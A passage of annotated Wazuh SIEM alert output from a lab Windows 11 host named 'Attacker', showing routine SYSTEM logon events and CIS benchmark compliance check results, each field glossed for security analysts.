identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:47.759+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:47.759+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534507.2135547
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26164
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory determines whether the operating system generates audit events when changes are made to policy rules for the Microsoft Protection Service (MPSSVC.exe). Events for this subcategory include: - 4944: The following policy was active when the Windows Firewall started. - 4945: A rule was listed when the Windows Firewall started. - 4946: A change has been made to Windows Firewall exception list. A rule was added. - 4947: A change has been made to Windows Firewall exception list. A rule was modified. - 4948: A change has been made to Windows Firewall exception list. A rule was deleted. - 4949: Windows Firewall settings were restored to the default values. - 4950: A Windows Firewall setting has changed. - 4951: A rule has been ignored because its major version number was not recognized by Windows Firewall. - 4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced. - 4953: A rule has been ignored by Windows Firewall because it could not parse the rule. - 4954: Windows Firewall Group Policy settings have changed. The new settings have been applied. - 4956: Windows Firewall has changed the active profile. - 4957: Windows Firewall did not apply the following rule. - 4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer. The recommended state for this setting is : Success and Failure
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Changes to firewall rules are important for understanding the security state of the computer and how well it is protected against network attacks.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit MPSSVC Rule-Level Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
passed, failed or not applicable. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:49.319+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:49.319+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  60
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534509.2141014
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:41.9709687Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43895
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  15764
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)

🧠 What happened? SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:58.036+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:58.036+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19004
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534518.2148353
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  summary
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.description:  This document provides prescriptive guidance for establishing a secure configuration posture for Microsoft Windows 11.
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.policy_id:  cis_win11_enterprise_21H2
Internal ID string for that policy.

data.sca.passed:  121
Checks that were green – a quick confidence boost.

data.sca.failed:  249
Number of failed checks in the scan. Lots of red means poor hygiene.

data.sca.invalid:  25
Checks that couldn’t run (permissions, missing file, etc.).

data.sca.total_checks:  395
Total tests executed this run.

data.sca.score:  32
Overall compliance score 0‑100%. Under 85% usually needs remediation.

data.sca.file:  cis_win11_enterprise.yml
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:58.866+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:58.866+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534518.2149670
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26000
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enforce password history' is set to '24 or more password(s)'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines the number of renewed, unique passwords that have to be associated with a user account before you can reuse an old password. The value for this policy setting must be between 0 and 24 passwords. The default value for Windows Vista is 0 passwords, but the default setting in a domain is 24 passwords. To maintain the effectiveness of this policy setting, use the Minimum password age setting to prevent users from repeatedly changing their password. The recommended state for this setting is: 24 or more password(s). Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Note #2: As of the publication of this benchmark, Microsoft currently has a maximum limit of 24 saved passwords. For more information, please visit Enforce password history (Windows 10) - Windows security | Microsoft Docs
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The longer a user uses the same password, the greater the chance that an attacker can determine the password through brute force attacks. Also, any accounts that may have been compromised will remain exploitable for as long as the password is left unchanged. If password changes are required but password reuse is not prevented, or if users continually reuse a small number of passwords, the effectiveness of a good password policy is greatly reduced. If you specify a low number for this policy setting, users will be able to use the same small number of passwords repeatedly. If you do not also configure the Minimum password age setting, users might repeatedly change their passwords until they can reuse their original password.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 24 or more password(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Enforce password history
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.080+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.080+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  61
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2155758
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:56.4609484Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43897
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  2444
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

